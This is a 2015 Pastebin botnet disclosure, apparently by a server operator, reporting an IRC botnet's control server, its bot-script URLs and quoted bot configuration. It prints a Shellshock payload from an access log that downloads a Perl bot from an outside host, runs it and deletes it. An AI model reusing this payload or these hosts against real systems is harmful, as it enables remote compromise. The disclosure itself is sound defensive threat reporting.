Public Pastes
daily pastebin goal
90%
SHARE
TWEET

irc botnet disclosure 16/JAN/2015 - part 3

a guest Jan 16th, 2015 535 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. http://pastebin.com/SPMkyZ4w - saga continues.. (:
  2.  _____________________________________
  3. [```` BOTNET INVESTIGATION REPORT ````]
  4.  `````````````````````````````````````
  5.  
  6.  Date: January 16, 2015
  7.  Botnet type: IRC Bots/Malware
  8.  Botnet control server IP: 64.32.12.57   (Sharktech.net)
  9.  Protocol: IRC
  10.  Port: 80   ( /connect 64.32.12.57 80    -j #new )
  11.  Hacked hosts: >500
  12.  Previous report of the same botnet: http://pastebin.com/DabxDiwm , http://pastebin.com/SPMkyZ4w
  13.  Bot url: http://74.208.166.12/bot.txt  (mirror: http://pastebin.com/Zbkke58A)  
  14.              (u17173405.onlinehome-server.com Numerical: 74.208.166.12)
  15.  
  16.  Access log:
  17. 217.114.212.26 - - [16/Jan/2015:15:46:35 -0500] "GET /phppath/cgi_wrapper HTTP/1.0" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'"
  18.  
  19.  
  20. We can clearly see that this is a shell-shock exploitation try and the source code is here:
  21.  http://74.208.166.12/bot.txt  ( MIRROR:  http://pastebin.com/Zbkke58A )
  22.  
  23. From the source code we can clearly see that this is an IRC bot that connects to a following server:
  24. $servidor='64.32.12.57' unless $servidor;
  25. my $porta='80';
  26. my @canais=("#new");
  27. my @adms=("X","Y");
  28. my @auth=("*!*@evil");
  29.  
  30. Hey, whoever you are, it's a third time I reporting you to the public, maybe you'll stop attacking my server? I see you are enjoying everyone using your botnet :-) Good luck.
RAW Paste Data
Top